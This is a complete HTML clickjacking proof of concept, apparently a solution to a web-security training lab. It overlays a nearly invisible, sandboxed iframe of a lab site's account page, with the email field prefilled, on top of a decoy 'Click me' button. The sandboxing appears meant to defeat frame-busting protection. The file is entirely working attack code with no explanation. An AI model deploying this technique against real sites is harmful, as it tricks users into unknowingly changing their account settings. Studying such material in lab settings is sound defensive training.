<!DOCTYPE html>
<html lang="en">
<body>
    <style>
        iframe {
            position:relative;
            width: 500px;
            height: 700px;
            opacity: 0.1;
            z-index: 2;
        }
        div {
            position:absolute;
            top: 450px;
            left: 70px;;
            z-index: 1;
        }
        button.buttom{
            border: none;
            user-select: none;
            background-color: #159c80;
            color: #fff;
            font-size: 16px;
            font-weight: bold;
            padding: 7px 1em;
            text-align: center;
            text-decoration: none !important;
            white-space: nowrap;
            min-width: 120px;
            border-radius: 25px;
        }
    </style>
    <div>
        <button class="buttom">Click me</button>
    </div>

    <iframe sandbox="allow-forms" src="https://0a8b006103ca2bcb83f5c33600a90017.web-security-academy.net/my-account?email=wiener@gmail.com"></iframe>    
</body>
</html>